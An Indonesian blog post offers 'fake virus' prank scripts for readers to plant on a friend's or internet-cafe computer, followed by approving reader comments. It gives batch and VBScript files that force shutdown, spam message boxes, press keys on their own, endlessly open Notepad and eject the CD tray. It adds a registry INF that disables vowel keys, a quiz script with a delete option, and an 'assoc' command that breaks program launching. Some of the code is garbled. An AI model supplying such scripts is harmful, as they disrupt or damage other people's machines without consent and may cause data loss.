Tips n Trik Jahil Fake Virus Via Notepad

 

Tips n Trik Jahil Fake Virus Via Notepad
SimBale

Hello whazzup guys, bertemu lagi dengan saya admin - aditya di blog kesayangan kita SimBale. Oke kadang kita merasa jengkel ama temen kita, gara-gara kita dikerjain kita jengkel sendiri. Nah kali ini kita akan kerjain balik temen kita tetapi lewat perantara laptop / pc teman kita dengan Tips n Trik Jahil Fake Virus Via Notepad. Tenang aja ini hanya fake virus bukan virus asli jadi aman okey. Lalu untuk sistem kerjanya dan bahan - bahannya saya jelaskan dibawah ini :

Alat dan Bahan :
  • Laptop / PC
  • Listrik
  • Mental n Keberanian
  • Seorang target sasaran
  • Internet n Jaringan Listrik
  • Notepad (Unduh disini)
  • Keyboard
  • Kemauan untuk jahil
  • Terakhir kopi :D
Langkah - langkah
  • Membuat Forced Shutdown PC / Laptop
-> Buka Notepad dan copy script dibawah ini :

@echo off
msg * This Computer Error
shutdown -c "Error! Shutdown" -s 


-> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
-> Sebarkan File tersebut di Komputer teman sobat, maka Komputer korban akan otomatis Forced Shutdown
  • Membuat Tombol Caps-Lock Menyala Terus-Menerus
-> Buka Notepad dan copy script dibawah ini :

    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop 

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
-> Sebarkan File tersebut di Komputer teman sobat, maka tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi)

  • Membuat Pesan Jail Muncul Terus
-> Buka Notepad dan copy script dibawah ini :

@ECHO off
:Begin
msg * pesan sobat 1
msg * pesan sobat 2
msg * pesan sobat 3
msg * pesan sobat 4
msg * pesan sobat 5
GOTO BEGIN

-> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
-> Sebarkan File tersebut di Komputer teman sobat, maka pesan jail akan muncul terus. 
NB : Sobat dapat mengganti "pesan sobat 1 - 5" sesuai dengan kemauan sobat. 
  • Membuat CD/DVD Room Membuka-Tutup
-> Buka Notepad dan copy script dibawah ini :

    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
-> Sebarkan File tersebut di Komputer teman sobat, maka CD-Room akan membuka tutup.

NB : Bagi laptop / pc yang memiliki cd / dvd roomnya.
  • Membuat Script Muncul Terus
-> Buka Notepad dan copy scipt dibawah ini :
  
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop   

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file 
-> Sebarkan File tersebut di Komputer teman sobat, maka script akan muncul terus menerus.
  • Membuat Tombol Backspace Menjadi Error (Mencet Terus)
-> Buka Notepad dan copy script dibawah ini :

    MsgBox "kembali ke menu sebelumnya"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
-> Sebarkan File tersebut di Komputer teman sobat, maka Tombol Backspace akan error dan menekan dengan sendirinya 
  • Membuat Pesan Pop Up Komputer di Notepad
-> Buka Notepad dan copy script dibawah ini :

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "Kamu Jelek!"
    loop 

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file
-> Sebarkan File tersebut di Komputer teman sobat, maka pesan "Kamu Jelek!" akan terus muncul
NB :  Sobat dapat mengganti kata "Kamu Jelek!" sesuai dengan kemauan sobat.
  • Membuat Notepad Terbuka Otomatis 
-> Buka Notepad dan copy script dibawah ini :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file 
-> Sebarkan File tersebut di Komputer teman sobat, maka notepad akan terbuka terus menerus
  • Membuat Notepad dengan Pesan Jahil
 -> Buka Notepad dan copy script dibawah ini :

WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!!

-> Simpan kode script di atas di Notepad dengan nama : virhack.VBS >> type file : All file 
-> Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pesan jail akan terbuka terus
NB : Sobat dapat mengganti kode berwarna ungu dengan selera sobat
  • Membuat Memilih jawaban seperti Quiz di Notepad 
-> Buka Notepad dan copy script dibawah ini :

    WScript.Sleep 1800
    WScript.Sleep 100
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    @echo off
    title quiz hari ini :)
    :menu
    cls
    echo jika kamu kena virus apa
    yang kamu lakukan

    pause
    echo pilih yang mana :
    echo 1. matiin computer
    echo 2. format aja
    echo 3. bingung ahh
    set input=nothing
    set /p input=Choice:
    if %input%==1 shutdown -s -t
    30
    if %input%==2 del c:xxx
    if %input%==3 @ECHO off
    msg * muka lo rusak
    msg * ngaca dulu gih
    msg * hayo lo,cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    @ECHO off
    :top
    START %SystemRoot%
    system32notepad.exe
    GOTO top

-> Simpan kode script di atas di Notepad dengan nama : virhack.BAT >> type file : All file
-> Sebarkan File tersebut di Komputer teman sobat, maka notepad dengan pertanyaan akan terbuka
NB : Sobat dapat mengganti kode berwarna ungu dengan selera sobat
  • Mematikan Tombol A-I-U-E-O pada Keyboard
-> Buka Notepad dan copy script dibawah ini :

    [Version]
    Signature=”$Windows NT$”

    [DefaultInstall]
    AddReg =AIUEO

    [AIUEO]
    HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode               Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
    17,00,00,00,18,00,00,00,16,00,00,00,00,00 


-> Simpan dengan nama "Jail.INF" >> type file : All File
-> Log Off Komputer >> Tombol AIUEO pada keyboard sudah tidak berfungsi.

Untuk menormalkan kembali, 
-> Buka Notepad dan copy script di bawah ini :

    [Version]
    Signature=”$Windows NT$”
    [DefaultInstall]
    DelReg =normal
    [normal]
    HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map” 

-> Save dengan nama "Normal.INF" >> type file : All File
-> Log Off Komputer >> Normall !! 
  • Merusak Komputer Teman/Warnet
-> Buka "CMD" dengan cara >> start >> run >> CMD
-> Copy/ketik kode di bawah ini:

    ASSOC.exe=.hank 


 -> Lalu Tekan Enter!

-> Cara Mengembalikan >> Buka CMD lagi
-> Ketikan kode di bawah ini :

    ASSOC.exe=EXEFILE 
-> Lalu Tekan Enter!

NB : Mohon jangan disalahgunakan, Admin - SimBale tidak bertanggung jawab atas apa yang terjadi.
Semoga bermanfaat
Best Regards
Admin - Aditya

4 komentar

Wkwkwk bisa dipraktekin deh ini gan biar jadi obat stress wkwkw

Mantap. Bisa langsung Praktek nih Gan.

ooo jadi selama ini sobat stress :V kwkwkwkw

silahkan emang dari dulu artikel ane mantep2 :D

Peraturan Komentar SimBalisme :
~ Jangan gunakan link aktif ( live link )
~ Berkomentar sesuai artikel
~ Dilarang berkata kotor, SARA, SPAM, dan Pornografi
EmoticonEmoticon